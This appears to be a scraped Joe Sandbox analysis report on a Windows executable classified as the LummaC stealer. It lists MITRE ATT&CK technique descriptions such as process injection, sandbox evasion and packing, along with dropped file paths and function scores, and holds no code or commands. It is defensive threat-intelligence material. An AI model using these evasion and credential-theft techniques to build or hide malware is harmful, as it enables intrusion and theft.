Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Lisect_AVT_24003_G1A_70.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_oHOvZLBf.exe_ef3ef087bfe1a04e60882b1f0137943404fb79_63dab170_18f3e01d-e9ad-41e1-b61a-5f311b0ed995\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3E3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5A9.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5E8.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k2[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k3[1].rar

C:\Users\user\AppData\Local\Temp\05734EF9.exe

C:\Users\user\AppData\Local\Temp\37AE5FF3.exe

Windows Analysis Report
Lisect_AVT_24003_G1A_70.exe

Function 00DF29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 00DF1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Function 00DF1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Function 00DF6076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Function 00DF2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Function 00DF1E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Function 00DF1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Function 00DF28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Function 00DF1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Function 00DF1000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Function 00DF2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Function 00DF14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Function 00DF1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre